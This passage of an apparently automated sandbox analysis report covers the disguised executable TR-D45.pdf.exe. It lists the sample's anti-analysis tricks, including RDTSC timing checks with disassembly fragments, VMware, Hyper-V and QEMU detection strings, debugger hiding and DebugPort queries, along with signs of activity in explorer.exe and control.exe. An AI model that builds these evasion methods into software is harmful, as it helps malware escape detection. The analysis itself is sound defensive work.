      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000005680E8 second address: 00000000005680E8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FF010BA1252h 0x0000001f popad 0x00000020 call 00007FF010BA0BCFh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 0000000000560F1B second address: 0000000000569812 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dword ptr [ebp+0000009Ch] 0x00000009 cmp bh, bh 0x0000000b push eax 0x0000000c jmp 00007FF010BA7C0Eh 0x0000000e cmp dh, ah 0x00000010 call 00007FF010BB03E8h 0x00000015 jmp 00007FF010BA7C12h 0x00000017 cmp ax, cx 0x0000001a call 00007FF010BA7BE5h 0x0000001f pop ebx 0x00000020 sub ebx, 05h 0x00000023 inc ebx 0x00000024 dec ebx 0x00000025 xor edx, edx 0x00000027 mov eax, ebx 0x00000029 mov ecx, 00000004h 0x0000002e div ecx 0x00000030 jmp 00007FF010BA7C0Eh 0x00000032 cmp dh, ah 0x00000034 cmp edx, 00000000h 0x00000037 jne 00007FF010BA7BA1h 0x00000039 movd mm3, ebx 0x0000003c jmp 00007FF010BA7C0Ah 0x0000003e pushad 0x0000003f mov edx, 00000023h 0x00000044 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000024498E4 second address: 00000000024498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 0000000002449B5E second address: 0000000002449B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399799 rdtsc 0_2_02399799
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe TID: 6656 | Thread sleep count: 192 > 30
      Source: C:\Windows\explorer.exe TID: 4860 | Thread sleep time: -54000s >= -30000s
      Source: C:\Windows\SysWOW64\control.exe TID: 6664 | Thread sleep time: -50000s >= -30000s
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: explorer.exe, 00000005.00000002.507545804.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsers\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db@
      Source: explorer.exe, 00000005.00000000.296937352.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 00000005.00000000.281354355.0000000003710000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000005.00000000.281932971.000000000375B000.00000004.00000001.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000005.00000000.282007162.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000005.00000000.281932971.000000000375B000.00000004.00000001.sdmp | Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000005.00000002.495706634.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
      Source: explorer.exe, 00000005.00000000.297301925.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
      Source: explorer.exe, 00000005.00000002.507545804.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: TR-D45.pdf.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000005.00000000.297301925.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
      Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW@%
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_0239071B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000 0_2_0239071B
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Process queried: DebugPort
      Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02399799 rdtsc 0_2_02399799
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02395737 LdrInitializeThunk, 0_2_02395737
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_023989D5 mov eax, dword ptr fs:[00000030h] 0_2_023989D5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02392372 mov eax, dword ptr fs:[00000030h] 0_2_02392372
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_023941DF mov eax, dword ptr fs:[00000030h] 0_2_023941DF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02398A59 mov eax, dword ptr fs:[00000030h] 0_2_02398A59
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02398A97 mov eax, dword ptr fs:[00000030h] 0_2_02398A97
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02398B37 mov eax, dword ptr fs:[00000030h] 0_2_02398B37
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02398B03 mov eax, dword ptr fs:[00000030h] 0_2_02398B03
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02392B41 mov eax, dword ptr fs:[00000030h] 0_2_02392B41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02397BBE mov eax, dword ptr fs:[00000030h] 0_2_02397BBE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_023989FF mov eax, dword ptr fs:[00000030h] 0_2_023989FF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02392F3B mov eax, dword ptr fs:[00000030h] 0_2_02392F3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02392F0A mov eax, dword ptr fs:[00000030h] 0_2_02392F0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02392F8B mov eax, dword ptr fs:[00000030h] 0_2_02392F8B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02396D27 mov eax, dword ptr fs:[00000030h] 0_2_02396D27
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 0_2_02396D4F mov eax, dword ptr fs:[00000030h] 0_2_02396D4F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26E620 mov eax, dword ptr fs:[00000030h] 1_2_1E26E620
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E31FE3F mov eax, dword ptr fs:[00000030h] 1_2_1E31FE3F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h] 1_2_1E26C600
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h] 1_2_1E26C600
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h] 1_2_1E26C600
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E298E00 mov eax, dword ptr fs:[00000030h] 1_2_1E298E00
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29A61C mov eax, dword ptr fs:[00000030h] 1_2_1E29A61C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29A61C mov eax, dword ptr fs:[00000030h] 1_2_1E29A61C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321608 mov eax, dword ptr fs:[00000030h] 1_2_1E321608
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27766D mov eax, dword ptr fs:[00000030h] 1_2_1E27766D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] 1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] 1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] 1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] 1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] 1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] 1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] 1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] 1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] 1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] 1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] 1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32AE44 mov eax, dword ptr fs:[00000030h] 1_2_1E32AE44
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32AE44 mov eax, dword ptr fs:[00000030h] 1_2_1E32AE44
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E46A7 mov eax, dword ptr fs:[00000030h] 1_2_1E2E46A7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h] 1_2_1E330EA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h] 1_2_1E330EA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h] 1_2_1E330EA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FFE87 mov eax, dword ptr fs:[00000030h] 1_2_1E2FFE87
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2776E2 mov eax, dword ptr fs:[00000030h] 1_2_1E2776E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2916E0 mov ecx, dword ptr fs:[00000030h] 1_2_1E2916E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E338ED6 mov eax, dword ptr fs:[00000030h] 1_2_1E338ED6
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2936CC mov eax, dword ptr fs:[00000030h] 1_2_1E2936CC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2A8EC7 mov eax, dword ptr fs:[00000030h] 1_2_1E2A8EC7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E31FEC0 mov eax, dword ptr fs:[00000030h] 1_2_1E31FEC0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E264F2E mov eax, dword ptr fs:[00000030h] 1_2_1E264F2E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E264F2E mov eax, dword ptr fs:[00000030h] 1_2_1E264F2E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29E730 mov eax, dword ptr fs:[00000030h] 1_2_1E29E730
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29A70E mov eax, dword ptr fs:[00000030h] 1_2_1E29A70E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29A70E mov eax, dword ptr fs:[00000030h] 1_2_1E29A70E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E33070D mov eax, dword ptr fs:[00000030h] 1_2_1E33070D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E33070D mov eax, dword ptr fs:[00000030h] 1_2_1E33070D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28F716 mov eax, dword ptr fs:[00000030h] 1_2_1E28F716
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FFF10 mov eax, dword ptr fs:[00000030h] 1_2_1E2FFF10
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FFF10 mov eax, dword ptr fs:[00000030h] 1_2_1E2FFF10
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27FF60 mov eax, dword ptr fs:[00000030h] 1_2_1E27FF60
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E338F6A mov eax, dword ptr fs:[00000030h] 1_2_1E338F6A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27EF40 mov eax, dword ptr fs:[00000030h] 1_2_1E27EF40
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E278794 mov eax, dword ptr fs:[00000030h] 1_2_1E278794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h] 1_2_1E2E7794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h] 1_2_1E2E7794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h] 1_2_1E2E7794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2A37F5 mov eax, dword ptr fs:[00000030h] 1_2_1E2A37F5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29BC2C mov eax, dword ptr fs:[00000030h] 1_2_1E29BC2C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h] 1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h] 1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h] 1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h] 1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h] 1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h] 1_2_1E33740D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h] 1_2_1E33740D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h] 1_2_1E33740D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28746D mov eax, dword ptr fs:[00000030h] 1_2_1E28746D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29A44B mov eax, dword ptr fs:[00000030h] 1_2_1E29A44B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FC450 mov eax, dword ptr fs:[00000030h] 1_2_1E2FC450
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2FC450 mov eax, dword ptr fs:[00000030h] 1_2_1E2FC450
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27849B mov eax, dword ptr fs:[00000030h] 1_2_1E27849B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E3214FB mov eax, dword ptr fs:[00000030h] 1_2_1E3214FB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h] 1_2_1E2E6CF0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h] 1_2_1E2E6CF0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h] 1_2_1E2E6CF0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E338CD6 mov eax, dword ptr fs:[00000030h] 1_2_1E338CD6
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E338D34 mov eax, dword ptr fs:[00000030h] 1_2_1E338D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32E539 mov eax, dword ptr fs:[00000030h] 1_2_1E32E539
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h] 1_2_1E294D3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h] 1_2_1E294D3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h] 1_2_1E294D3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h] 1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E26AD30 mov eax, dword ptr fs:[00000030h] 1_2_1E26AD30
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2EA537 mov eax, dword ptr fs:[00000030h] 1_2_1E2EA537
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28C577 mov eax, dword ptr fs:[00000030h] 1_2_1E28C577
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E28C577 mov eax, dword ptr fs:[00000030h] 1_2_1E28C577
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2A3D43 mov eax, dword ptr fs:[00000030h] 1_2_1E2A3D43
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E3540 mov eax, dword ptr fs:[00000030h] 1_2_1E2E3540
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E313D40 mov eax, dword ptr fs:[00000030h] 1_2_1E313D40
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E287D50 mov eax, dword ptr fs:[00000030h] 1_2_1E287D50
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2935A1 mov eax, dword ptr fs:[00000030h] 1_2_1E2935A1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E291DB5 mov eax, dword ptr fs:[00000030h] 1_2_1E291DB5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E291DB5 mov eax, dword ptr fs:[00000030h] 1_2_1E291DB5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E291DB5 mov eax, dword ptr fs:[00000030h] 1_2_1E291DB5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E3305AC mov eax, dword ptr fs:[00000030h] 1_2_1E3305AC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E3305AC mov eax, dword ptr fs:[00000030h] 1_2_1E3305AC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E292581 mov eax, dword ptr fs:[00000030h] 1_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E292581 mov eax, dword ptr fs:[00000030h] 1_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E292581 mov eax, dword ptr fs:[00000030h] 1_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E292581 mov eax, dword ptr fs:[00000030h] 1_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h] 1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h] 1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h] 1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h] 1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h] 1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29FD9B mov eax, dword ptr fs:[00000030h] 1_2_1E29FD9B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E29FD9B mov eax, dword ptr fs:[00000030h] 1_2_1E29FD9B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E318DF1 mov eax, dword ptr fs:[00000030h] 1_2_1E318DF1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27D5E0 mov eax, dword ptr fs:[00000030h] 1_2_1E27D5E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E27D5E0 mov eax, dword ptr fs:[00000030h] 1_2_1E27D5E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32FDE2 mov eax, dword ptr fs:[00000030h] 1_2_1E32FDE2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32FDE2 mov eax, dword ptr fs:[00000030h] 1_2_1E32FDE2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32FDE2 mov eax, dword ptr fs:[00000030h] 1_2_1E32FDE2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E32FDE2 mov eax, dword ptr fs:[00000030h] 1_2_1E32FDE2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h] 1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe Code function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h] 1_2_1E2E6DC9
